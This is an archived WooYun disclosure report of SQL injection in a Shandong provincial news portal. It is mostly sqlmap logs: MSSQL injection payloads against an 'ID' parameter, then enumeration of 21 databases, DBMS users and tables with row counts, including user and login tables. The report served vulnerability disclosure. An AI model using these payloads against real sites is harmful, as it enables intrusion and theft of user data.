当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158905

漏洞标题:中国山东网主站多处存在sql注入(可dump21个库/用户信息/大量记录信息泄漏)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-12-08 00:32

修复时间:2016-01-23 15:16

公开时间:2016-01-23 15:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-08: 细节已通知厂商并且等待厂商处理中
2015-12-11: 厂商已经确认,细节仅向厂商公开
2015-12-21: 细节向核心白帽子及相关领域专家公开
2015-12-31: 细节向普通白帽子公开
2016-01-10: 细节向实习白帽子公开
2016-01-23: 细节向公众公开

简要描述:

21个数据库均可dump,大量的记录信息可泄漏,多个子站用户信息密码也可被泄漏。

详细说明:

网址帮忙打码!~~~
中国山东网(**.**.**.**)是经国务院新闻办公室批准成立的全国重点新闻网站,由山东省人民政府新闻办公室主管、走向世界杂志社主办,新之航传媒集团山东网新传媒有限公司总策划运营,于1996年正式开通。
注入点一:抓包的到的某处接口

http://**.**.**.**/Tool/SupportTool.ashx?InitialCount=1&ID=92&Type=finance&callback=jsonp1449335506048&_=1449335507425
ID存在注入


1.jpg


2.jpg


[01:21:55] [INFO] testing connection to the target URL
[01:21:55] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[01:21:56] [INFO] target URL is stable
[01:21:56] [INFO] testing if GET parameter 'InitialCount' is dynamic
[01:21:56] [WARNING] GET parameter 'InitialCount' does not appear dynamic
[01:21:56] [WARNING] heuristic (basic) test shows that GET parameter 'InitialCou
nt' might not be injectable
[01:21:56] [INFO] testing for SQL injection on GET parameter 'InitialCount'
[01:21:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:21:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[01:21:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:22:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[01:22:00] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[01:22:01] [INFO] testing 'MySQL inline queries'
[01:22:01] [INFO] testing 'PostgreSQL inline queries'
[01:22:01] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:22:01] [INFO] testing 'Oracle inline queries'
[01:22:02] [INFO] testing 'SQLite inline queries'
[01:22:02] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:22:02] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:22:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:22:04] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:22:04] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:22:05] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:22:06] [INFO] testing 'Oracle AND time-based blind'
[01:22:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:22:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:22:14] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[01:22:22] [WARNING] GET parameter 'InitialCount' is not injectable
[01:22:22] [INFO] testing if GET parameter 'ID' is dynamic
[01:22:23] [INFO] confirming that GET parameter 'ID' is dynamic
[01:22:23] [INFO] GET parameter 'ID' is dynamic
[01:22:23] [INFO] heuristic (basic) test shows that GET parameter 'ID' might be
injectable
[01:22:23] [INFO] testing for SQL injection on GET parameter 'ID'
[01:22:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:22:23] [WARNING] reflective value(s) found and filtering out
[01:22:24] [INFO] GET parameter 'ID' seems to be 'AND boolean-based blind - WHER
E or HAVING clause' injectable
[01:22:25] [INFO] heuristic (extended) test shows that the back-end DBMS could b
e 'Microsoft SQL Server'
do you want to include all tests for 'Microsoft SQL Server' extending provided l
evel (1) and risk (1)? [Y/n]
[01:22:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[01:22:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:22:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[01:22:27] [INFO] GET parameter 'ID' is 'Microsoft SQL Server/Sybase AND error-b
ased - WHERE or HAVING clause' injectable
[01:22:27] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:22:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:22:37] [INFO] GET parameter 'ID' seems to be 'Microsoft SQL Server/Sybase st
acked queries' injectable
[01:22:37] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:22:48] [INFO] GET parameter 'ID' seems to be 'Microsoft SQL Server/Sybase ti
me-based blind' injectable
[01:22:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:22:48] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[01:22:48] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[01:22:48] [INFO] target URL appears to have 1 column in query
[01:22:49] [INFO] GET parameter 'ID' is 'Generic UNION query (NULL) - 1 to 20 co
lumns' injectable
GET parameter 'ID' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] N
sqlmap identified the following injection points with a total of 267 HTTP(s) req
uests:
---
Place: GET
Parameter: ID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: InitialCount=1&ID=92 AND 8721=8721&Type=finance&callback=jsonp14493
35506048&_=1449335507425
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: InitialCount=1&ID=92 AND 9536=CONVERT(INT,(SELECT CHAR(113)+CHAR(12
0)+CHAR(98)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN (9536=9536) THEN CHAR(49) ELS
E CHAR(48) END))+CHAR(113)+CHAR(108)+CHAR(117)+CHAR(104)+CHAR(113)))&Type=financ
e&callback=jsonp1449335506048&_=1449335507425
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: InitialCount=1&ID=92 UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(98)+
CHAR(121)+CHAR(113)+CHAR(86)+CHAR(111)+CHAR(98)+CHAR(80)+CHAR(99)+CHAR(116)+CHAR
(70)+CHAR(67)+CHAR(109)+CHAR(86)+CHAR(113)+CHAR(108)+CHAR(117)+CHAR(104)+CHAR(11
3)-- &Type=finance&callback=jsonp1449335506048&_=1449335507425
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: InitialCount=1&ID=92; WAITFOR DELAY '0:0:5'--&Type=finance&callback
=jsonp1449335506048&_=1449335507425
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: InitialCount=1&ID=92 WAITFOR DELAY '0:0:5'--&Type=finance&callback=
jsonp1449335506048&_=1449335507425
---
[01:22:53] [INFO] testing Microsoft SQL Server
[01:22:53] [INFO] confirming Microsoft SQL Server
[01:22:53] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[01:26:19] [INFO] fetching current user
[01:26:20] [WARNING] reflective value(s) found and filtering out
current user:    'idollar'
[01:26:20] [INFO] fetching current database
current database:    'SDSW20_Other'
[01:26:20] [INFO] testing if current user is DBA
current user is DBA:    False
database management system users [2]:
[*] idollar
[*] sa
available databases [21]:
[*] 91haofang
[*] adv_new
[*] bbs
[*] cms_newair
[*] jiaju
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] SD_QIYE
[*] SDSW20_Ads
[*] SDSW20_Ask
[*] SDSW20_Digg
[*] SDSW20_HR
[*] SDSW20_Main
[*] SDSW20_Other
[*] SDSW20_Rank
[*] SDSW20_Video_old
[*] tempdb
[*] yycar
Database: SDSW20_Ads
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.IPToCity                                     | 319356  |
| dbo.cli_adv                                      | 37      |
| dbo.loca                                         | 22      |
| dbo.cli_num                                      | 11      |
| dbo.ad_m                                         | 2       |
| dbo.ad_m                                         | 2       |
| dbo.adv_m                                        | 2       |
| dbo.adv_m                                        | 2       |
| dbo.c_adv                                        | 2       |
+--------------------------------------------------+---------+
Database: SDSW20_Digg
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.DG_DiggInfo1                                 | 847     |
| dbo.DG_DiggInfo1                                 | 847     |
| dbo.DG_DiggRemark                                | 260     |
| dbo.DG_DiggRemarks                               | 67      |
| dbo.dg_CollectSet                                | 41      |
| dbo.TC_DiggCatogry                               | 18      |
+--------------------------------------------------+---------+
Database: jiaju
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.operationlog                                 | 1018    |
| dbo.imagelibrary                                 | 578     |
| **.**.**.**pany                                      | 126     |
| dbo.specail                                      | 51      |
| dbo.designer                                     | 47      |
| dbo.sampleroom                                   | 45      |
| dbo.news_class                                   | 25      |
| dbo.news_class                                   | 25      |
| dbo.area                                         | 17      |
| dbo.category                                     | 16      |
| dbo.administrator                                | 14      |
| dbo.friendlink                                   | 7       |
| dbo.usertype                                     | 2       |
+--------------------------------------------------+---------+
Database: SDSW20_Other
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.UserClicks                                   | 16278   |
| dbo.TC_Area                                      | 3526    |
| dbo.TE_TourImages                                | 3419    |
| dbo.te_PlaceToAgent                              | 2406    |
| dbo.TE_PlaceRemark                               | 1618    |
| dbo.TE_LeisureImages                             | 1540    |
| dbo.TE_MallImages                                | 1148    |
| dbo.TE_TourLineItem                              | 821     |
| dbo.TE_TourPlace                                 | 816     |
| dbo.TE_FoodImages                                | 768     |
| dbo.TE_FoodImages                                | 768     |
| dbo.TE_MallPlace                                 | 496     |
| dbo.TE_FinanceImages                             | 423     |
| dbo.TE_HouseImages                               | 372     |
| dbo.TE_LeisurePlace                              | 365     |
| dbo.TE_HealthImages                              | 338     |
| dbo.TE_EntImages                                 | 311     |
| dbo.TE_HealthPlace                               | 311     |
| dbo.TE_FinancePlace                              | 304     |
| dbo.TE_FoodPlace                                 | 284     |
| dbo.TB_Bulletin                                  | 275     |
| dbo.TE_EntPlace                                  | 257     |
| dbo.TE_AutoImages                                | 249     |
| dbo.TE_HousePlace                                | 227     |
| dbo.TE_EduImages                                 | 202     |
| dbo.TE_TourBooking                               | 176     |
| dbo.TB_AdBak2009319                              | 172     |
| dbo.TB_AdBak2009319                              | 172     |
| dbo.TE_SportsImages                              | 161     |
| dbo.TE_GolfImages                                | 153     |
| dbo.TE_AutoPlace                                 | 152     |
| dbo.TE_Finance_ManageMoney                       | 127     |
| dbo.TE_EduPlace                                  | 122     |
| dbo.TC_PlaceCatogry1                             | 88      |
| dbo.TC_PlaceCatogry1                             | 88      |
| dbo.TB_PKDetails                                 | 85      |
| dbo.TB_PKDetails                                 | 85      |
| dbo.TE_GolfPlace                                 | 83      |
| dbo.member                                       | 60      |
| dbo.TE_CourseApply                               | 59      |
| dbo.TE_Course2                                   | 55      |
| dbo.TE_Course2                                   | 55      |
| dbo.TE_SportsPlace                               | 49      |
| dbo.TC_ProductCatogry                            | 42      |
| dbo.TE_EduConsult                                | 33      |
| dbo.TE_Product                                   | 33      |
| dbo.TB_Remark                                    | 28      |
| dbo.Banks                                        | 18      |
| dbo.TB_VotePosition                              | 16      |
| dbo.TB_VotePosition                              | 16      |
| dbo.TC_PlaceDegree                               | 15      |
| dbo.TE_CourseCategory                            | 13      |
| dbo.CurrencysTable                               | 12      |
| dbo.TC_BulletinPosition                          | 12      |
| dbo.TC_LeadBuyCategory                           | 11      |
| dbo.ManageMoneyTable                             | 9       |
| dbo.TB_PKPosition                                | 9       |
| dbo.TZ_category                                  | 7       |
| dbo.CardGrades                                   | 6       |
| dbo.TE_Attractions                               | 6       |
| dbo.CardTypes                                    | 5       |
| dbo.TB_Leave                                     | 5       |
| dbo.tb_test                                      | 5       |
| dbo.TF_SSInfo                                    | 4       |
| dbo.TE_CateMerchant                              | 3       |
| dbo.CardClass                                    | 2       |
| dbo.TB_leadBuyRemark                             | 2       |
| dbo.TB_LeadBuy                                   | 1       |
| dbo.TE_EduUser                                   | 1       |
| dbo.TE_Finance_Cards                             | 1       |
| dbo.TE_Hotel                                     | 1       |
| dbo.TE_Route                                     | 1       |
| dbo.TL_UserGroup                                 | 1       |
| dbo.TL_UserGroup                                 | 1       |
| dbo.TZ_rele                                      | 1       |
+--------------------------------------------------+---------+
Database: cms_newair
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.sd_stat_Info                                 | 337050  |
| dbo.sd_sys_logs                                  | 4541    |
| dbo.sd_Order                                     | 1029    |
| dbo.sd_Sys_Help                                  | 656     |
| dbo.sd_news_Class                                | 176     |
| dbo.sd_news_Class                                | 176     |
| dbo.sd_hr                                        | 37      |
| dbo.sd_api_qmenu                                 | 20      |
| dbo.sd_sys_LabelStyle                            | 20      |
| dbo.sd_baoming                                   | 17      |
| dbo.sd_News_URL                                  | 15      |
| dbo.sd_user_Message                              | 12      |
| dbo.sd_user_MessFiles                            | 12      |
| dbo.sd_sys_admingroup                            | 11      |
| dbo.sd_sys_admingroup                            | 11      |
| dbo.sd_sys_userfields                            | 11      |
| dbo.sd_sys_userfields                            | 11      |
| dbo.sd_user_Ghistory                             | 11      |
| dbo.sd_2016taili                                 | 10      |
| dbo.sd_sys_UserLevel                             | 10      |
| dbo.sd_sys_LabelFree                             | 6       |
| dbo.sd_sys_LabelClass                            | 4       |
| dbo.sd_sys_LabelClass                            | 4       |
| dbo.sd_stat_content                              | 3       |
| dbo.sd_news_topline                              | 2       |
| dbo.sd_sys_styleclass                            | 2       |
| dbo.sd_ads_class                                 | 1       |
| dbo.sd_ads_class                                 | 1       |
| dbo.sd_Collect_SiteFolder                        | 1       |
| dbo.sd_Collect_SiteFolder                        | 1       |
| dbo.sd_friend_pram                               | 1       |
| dbo.sd_news_site                                 | 1       |
| dbo.sd_stat_class                                | 1       |
| dbo.sd_stat_param                                | 1       |
| dbo.sd_sys_newsIndex                             | 1       |
| dbo.sd_sys_param                                 | 1       |
| dbo.sd_sys_parmConstr                            | 1       |
| dbo.sd_sys_parmPrint                             | 1       |
| dbo.sd_sys_Pramother                             | 1       |
| dbo.sd_sys_PramUser                              | 1       |
| dbo.sd_user_Group                                | 1       |
| dbo.sd_user_Guser                                | 1       |
+--------------------------------------------------+---------+
Database: SDSW20_HR
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.JobTree                                      | 850     |
| dbo.FromTree                                     | 405     |
| dbo.qygoldmanage                                 | 364     |
| dbo.invite_info                                  | 134     |
| dbo.Person_Login                                 | 108     |
| dbo.Company_Login                                | 103     |
| dbo.Company_Basemeans                            | 83      |
| dbo.Article_Content                              | 58      |
| dbo.Person_Basemeans                             | 37      |
| dbo.WillJob                                      | 32      |
| dbo.TradeTree                                    | 22      |
| dbo.FriendSite                                   | 16      |
| dbo.Fast_AD                                      | 12      |
| dbo.Article_Class                                | 9       |
| dbo.language                                     | 7       |
| dbo.School_Login                                 | 7       |
| dbo.Person_YPmanage                              | 5       |
| dbo.Team                                         | 5       |
| dbo.Advertisement                                | 4       |
| dbo.Index_ADFlash                                | 4       |
| dbo.Admin_Login                                  | 3       |
| dbo.AdZone                                       | 3       |
| dbo.School_Student                               | 3       |
| dbo.Article_Position                             | 2       |
| dbo.Hunter_Manage                                | 2       |
| dbo.Page_Basemeans                               | 2       |
| dbo.School_Basemeans                             | 2       |
| dbo.School_Message                               | 2       |
| dbo.Collection                                   | 1       |
| dbo.marqueeFont                                  | 1       |
| dbo.PageAbout                                    | 1       |
| dbo.pgzp                                         | 1       |
| dbo.Vote                                         | 1       |
+--------------------------------------------------+---------+
Database: SDSW20_Ask
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.AK_QuestionAskedUser                         | 3159    |
| dbo.AK_QuestionAskedUser                         | 3159    |
| dbo.vk_question                                  | 2741    |
| dbo.AK_Answer                                    | 1414    |
| dbo.TC_AskCatogry                                | 176     |
| dbo.AK_AnswerRemark                              | 44      |
| dbo.AK_AdditionalQuestion                        | 21      |
+--------------------------------------------------+---------+
Database: SDSW20_Rank
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.RK_RankItems                                 | 3053    |
| dbo.RK_RankInfo                                  | 332     |
| dbo.RK_RankRemark                                | 286     |
| dbo.TC_RankType1                                 | 20      |
| dbo.TC_RankType1                                 | 20      |
| dbo.tb_tempRank                                  | 18      |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile                                   | 3265    |
| dbo.backupset                                    | 1588    |
| dbo.backupmediafamily                            | 1584    |
| dbo.backupmediaset                               | 1584    |
| dbo.syspolicy_configuration                      | 4       |
+--------------------------------------------------+---------+
Database: yycar
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.auto_car_comments                            | 30718   |
| dbo.gData_News                                   | 14303   |
| dbo.sj_baoming                                   | 4143    |
| dbo.auto_car_air                                 | 2851    |
| dbo.auto_car_air                                 | 2851    |
| dbo.auto_car_body                                | 2851    |
| dbo.auto_car_engine                              | 2851    |
| dbo.auto_car_light                               | 2851    |
| dbo.auto_car_media                               | 2851    |
| dbo.auto_car_mirror                              | 2851    |
| dbo.auto_car_new                                 | 2851    |
| dbo.auto_car_on                                  | 2851    |
| dbo.auto_car_operate                             | 2851    |
| dbo.auto_car_out                                 | 2851    |
| dbo.auto_car_power                               | 2851    |
| dbo.auto_car_safe                                | 2851    |
| dbo.auto_car_site                                | 2851    |
| dbo.tg_baoming                                   | 2827    |
| dbo.oprate_log                                   | 2595    |
| dbo.auto_appraise                                | 871     |
| dbo.auto_user_news                               | 789     |
| dbo.auto_car_brand                               | 653     |
| dbo.auto_car_price                               | 245     |
| dbo.auto_tukuImage                               | 172     |
| dbo.auto_user_msg                                | 163     |
| dbo.auto_specail                                 | 96      |
| dbo.auto_news_class                              | 66      |
| dbo.auto_news_class                              | 66      |
| dbo.sys_puruser                                  | 39      |
| dbo.auto_ad_class                                | 34      |
| dbo.auto_ad_class                                | 34      |
| dbo.auto_user_action                             | 31      |
| dbo.auto_user_action                             | 31      |
| dbo.auto_position                                | 26      |
| dbo.sys_item                                     | 26      |
| dbo.auto_user_schoolbaom                         | 24      |
| dbo.auto_yangche                                 | 22      |
| dbo.auto_area                                    | 18      |
| dbo.auto_user_feel                               | 18      |
| dbo.gData_Setting                                | 17      |
| dbo.auto_user_order                              | 16      |
| dbo.auto_friendlink                              | 14      |
| dbo.auto_user_schoolprice                        | 13      |
| dbo.auto_class                                   | 12      |
| dbo.auto_tg_car                                  | 12      |
| dbo.auto_tg_car                                  | 12      |
| dbo.auto_user_type                               | 12      |
| dbo.auto_car_grade                               | 10      |
| dbo.auto_user_bx                                 | 10      |
| dbo.auto_source                                  | 9       |
| dbo.sys_config                                   | 9       |
| dbo.auto_user_remark                             | 7       |
| dbo.phpcms_model_field                           | 7       |
| dbo.auto_tukuCategory                            | 6       |
| dbo.auto_areatemp                                | 5       |
| dbo.auto_user_pay                                | 5       |
| dbo.auto_tg_xuechebm                             | 4       |
| dbo.auto_tg_xuechebm                             | 4       |
| dbo.sys_purgroup                                 | 4       |
| dbo.auto_user_guwen                              | 3       |
| dbo.auto_2car_buy                                | 2       |
| dbo.auto_2car_buy                                | 2       |
| dbo.auto_author                                  | 2       |
| dbo.auto_keys                                    | 1       |
| dbo.auto_tgbm                                    | 1       |
| dbo.sys_module                                   | 1       |
+--------------------------------------------------+---------+
Database: adv_new
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.c_adv_all                                    | 988744  |
| dbo.c_adv_all                                    | 988744  |
| dbo.IPToCity                                     | 319356  |
| dbo.adv                                          | 188     |
| dbo.ad                                           | 178     |
| dbo.c_ad_all                                     | 74      |
| dbo.c_ad_all                                     | 74      |
| dbo.loca                                         | 55      |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| sys.messages                                     | 98318   |
| sys.sysmessages                                  | 98318   |
| sys.fulltext_system_stopwords                    | 15829   |
| sys.syscolumns                                   | 11966   |
| sys.all_parameters                               | 7090    |
| sys.system_parameters                            | 7090    |
| sys.trace_subclass_values                        | 5366    |
| sys.all_columns                                  | 4670    |
| sys.system_columns                               | 4626    |
| sys.trace_event_bindings                         | 4304    |
| sys.syscomments                                  | 2994    |
| dbo.spt_values                                   | 2508    |
| sys.all_objects                                  | 1934    |
| sys.sysobjects                                   | 1934    |
| sys.system_objects                               | 1928    |
| sys.database_permissions                         | 1844    |
| sys.syspermissions                               | 1844    |
| sys.sysprotects                                  | 1843    |
| sys.all_sql_modules                              | 1783    |
| sys.system_sql_modules                           | 1783    |
| sys.dm_audit_actions                             | 454     |
| sys.spatial_reference_systems                    | 390     |
| sys.event_notification_event_types               | 365     |
| sys.all_views                                    | 354     |
| sys.system_views                                 | 354     |
| sys.trigger_event_types                          | 245     |
| sys.trace_events                                 | 180     |
| sys.allocation_units                             | 128     |
| sys.partitions                                   | 116     |
| sys.syscharsets                                  | 114     |
| sys.xml_schema_facets                            | 112     |
| sys.xml_schema_components                        | 99      |
| sys.system_components_surface_area_configuration | 95      |
| sys.dm_audit_class_type_map                      | 83      |
| sys.xml_schema_types                             | 82      |
| sys.configurations                               | 70      |
| sys.sysconfigures                                | 70      |
| sys.syscurconfigs                                | 70      |
| sys.trace_columns                                | 66      |
| sys.fulltext_document_types                      | 50      |
| sys.fulltext_languages                           | 48      |
| INFORMATION_SCHEMA.COLUMNS                       | 44      |
| sys.columns                                      | 44      |
| sys.systypes                                     | 34      |
| sys.types                                        | 34      |
| sys.syslanguages                                 | 33      |
| sys.database_recovery_status                     | 22      |
| sys.databases                                    | 22      |
| sys.securable_classes                            | 22      |
| sys.sysdatabases                                 | 22      |
| sys.trace_categories                             | 21      |
| sys.xml_schema_component_placements              | 18      |
| INFORMATION_SCHEMA.SCHEMATA                      | 15      |
| sys.schemas                                      | 15      |
| sys.xml_schema_attributes                        | 15      |
| sys.database_principals                          | 14      |
| sys.sysusers                                     | 14      |
| sys.server_principals                            | 11      |
| sys.service_contract_message_usages              | 11      |
| sys.server_permissions                           | 7       |
| sys.sysindexes                                   | 7       |
| sys.indexes                                      | 6       |
| sys.objects                                      | 6       |
| sys.stats_columns                                | 6       |
| sys.stats_columns                                | 6       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES              | 5       |
| INFORMATION_SCHEMA.TABLES                        | 5       |
| sys.index_columns                                | 5       |
| sys.sysindexkeys                                 | 5       |
| sys.tables                                       | 5       |
| sys.endpoints                                    | 4       |
| sys.assembly_types                               | 3       |
| sys.service_queue_usages                         | 3       |
| sys.type_assembly_usages                         | 3       |
| sys.xml_schema_namespaces                        | 3       |
| sys.database_files                               | 2       |
| sys.login_token                                  | 2       |
| sys.service_contract_usages                      | 2       |
| sys.sql_logins                                   | 2       |
| sys.sysfiles                                     | 2       |
| sys.syslogins                                    | 2       |
| sys.user_token                                   | 2       |
| dbo.spt_monitor                                  | 1       |
| sys.assemblies                                   | 1       |
| sys.assembly_files                               | 1       |
| sys.data_spaces                                  | 1       |
| sys.database_role_members                        | 1       |
| sys.default_constraints                          | 1       |
| sys.dm_exec_requests                             | 1       |
| sys.dm_exec_sessions                             | 1       |
| sys.filegroups                                   | 1       |
| sys.server_role_members                          | 1       |
| sys.servers                                      | 1       |
| sys.sysconstraints                               | 1       |
| sys.sysfilegroups                                | 1       |
| sys.sysmembers                                   | 1       |
| sys.sysprocesses                                 | 1       |
| sys.sysservers                                   | 1       |
| sys.tcp_endpoints                                | 1       |
| sys.via_endpoints                                | 1       |
| sys.xml_schema_collections                       | 1       |
| sys.xml_schema_model_groups                      | 1       |
| sys.xml_schema_wildcards                         | 1       |
+--------------------------------------------------+---------+
Database: SDSW20_Main
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.ph_Votes                                     | 755435  |
| dbo.TB_SysLog                                    | 565463  |
| dbo.flc_Votes                                    | 412653  |
| dbo.lt_CJResult                                  | 280828  |
| dbo.stu_Votes                                    | 264922  |
| dbo.SH_PersonVote                                | 151246  |
| dbo.ts_Votes                                     | 134817  |
| dbo.ph_Production                                | 112439  |
| dbo.vw_TU_User                                   | 81097   |
| dbo.yl_Votes                                     | 40133   |
| dbo.hs_Photos                                    | 17221   |
| dbo.ph_Comment                                   | 14572   |
| dbo.VT_DT_VoteIP                                 | 13706   |
| dbo.lt_temp                                      | 12840   |
| dbo.AdminUserRoles                               | 10479   |
| dbo.ph_ImageGroup                                | 9932    |
| dbo.hssd_Photos                                  | 9713    |
| dbo.sdair_VoteIP                                 | 8160    |
| dbo.sdair_VoteIP                                 | 8160    |
| dbo.dz_Votes                                     | 7351    |
| dbo.ta_ZhiBoItem                                 | 7083    |
| dbo.ta_ZhiBoItem                                 | 7083    |
| dbo.flc_Photos                                   | 6575    |
| dbo.wf_kx_AnswerPerson                           | 6206    |
| dbo.ta_BaoMing                                   | 4836    |
| dbo.shds_Photos                                  | 4770    |
| dbo.TU_User_Append                               | 3916    |
| dbo.TU_User_Append                               | 3916    |
| dbo.SH_PersonImage                               | 3904    |
| dbo.my_ShareRecord                               | 3789    |
| dbo.TC_Area                                      | 3525    |
| dbo.TS_DaRen                                     | 3168    |
| dbo.dl_Text                                      | 3047    |
| dbo.Common_Votes                                 | 2949    |
| dbo.TE_Agent                                     | 2506    |
| dbo.TS_DaRenUserInfo                             | 2445    |
| dbo.zgm_ShuXin                                   | 2226    |
| dbo.zgm_SunDream                                 | 2022    |
| dbo.ph_ProModiList                               | 1952    |
| dbo.stu_Photos                                   | 1753    |
| dbo.flc_ImageGroup                               | 1688    |
| dbo.shuhua_Photos                                | 1374    |
| dbo.shds_UserInfo                                | 1309    |
| dbo.TS_Production                                | 1254    |
| dbo.qx_ShareRecord                               | 1152    |
| dbo.dl_Photos                                    | 1050    |
| dbo.lh_RegisterLawyer                            | 1018    |
| dbo.my_SerialNumber                              | 1000    |
| dbo.zgm_AnswerPerson                             | 980     |
| dbo.dl_UserInfo                                  | 929     |
| dbo.btl_Votes                                    | 861     |
| dbo.zgm_ShaiXiaoKang                             | 803     |
| dbo.VT_DT_VoteItems                              | 769     |
| dbo.tb_SiteToFriendLink                          | 763     |
| dbo.yl_Photos                                    | 714     |
| dbo.dl_2015_Photos                               | 711     |
| dbo.sdchina_AnswerPerson                         | 684     |
| dbo.flc_UserInfo                                 | 621     |
| dbo.ZhengWen                                     | 597     |
| dbo.ph_HDBaoMing                                 | 565     |
| dbo.zgm_User                                     | 507     |
| dbo.btl_Photos                                   | 503     |
| dbo.zgm_CallDreamPingLun                         | 441     |
| dbo.zgm_CallDreamPingLun                         | 441     |
| dbo.dl_2015_UserInfo                             | 421     |
| dbo.TB_FunCodes                                  | 420     |
| dbo.TB_Columns                                   | 385     |
| dbo.stu_UserInfo                                 | 377     |
| dbo.qx_yh                                        | 351     |
| dbo.yl_Users                                     | 303     |
| dbo.wf_kx_Question                               | 302     |
| dbo.aspnet_UsersInRoles                          | 301     |
| dbo.aspnet_UsersInRoles                          | 301     |
| dbo.vw_aspnet_UsersInRoles                       | 301     |
| dbo.vw_aspnet_UsersInRoles                       | 301     |
| dbo.ph_Reserve                                   | 257     |
| dbo.ph_Funding                                   | 253     |
| dbo.AdminUserWork                                | 252     |
| dbo.SH_WebChat                                   | 243     |
| dbo.TC_SysFunctions                              | 240     |
| dbo.qilu_story                                   | 227     |
| dbo.VT_MT_Vote                                   | 221     |
| dbo.story_Stories                                | 211     |
| dbo.my_User                                      | 207     |
| dbo.TU_AdminBBS                                  | 205     |
| dbo.TU_AdminBBS                                  | 205     |
| dbo.dz_rqPlayer                                  | 195     |
| dbo.lf_Photo                                     | 189     |
| dbo.qx_User                                      | 179     |
| dbo.tb_PublishTo                                 | 178     |
| dbo.Dx_UserMaJia                                 | 176     |
| dbo.Dx_UserMaJia                                 | 176     |
| dbo.JJFZ_TouGao                                  | 174     |
| dbo.flc_Award                                    | 154     |
| dbo.aspnet_Membership                            | 149     |
| dbo.vw_aspnet_MembershipUsers                    | 149     |
| dbo.ph_HDZhaomuJune                              | 139     |
| dbo.qzlx_AnswerPerson                            | 130     |
| dbo.ph_UserInfoAppend                            | 121     |
| dbo.ph_UserInfoAppend                            | 121     |
| dbo.ph_SignUpHuace                               | 118     |
| dbo.ph_SignUpHuace                               | 118     |
| dbo.lf_UserInfo                                  | 106     |
| dbo.qx_BaoMing                                   | 99      |
| dbo.zgm_CallImg                                  | 98      |
| dbo.lcph_Photos                                  | 97      |
| dbo.shds_YuYue                                   | 91      |
| dbo.TS_UserInfo                                  | 91      |
| dbo.zgm_Question                                 | 89      |
| dbo.jh_Article                                   | 85      |
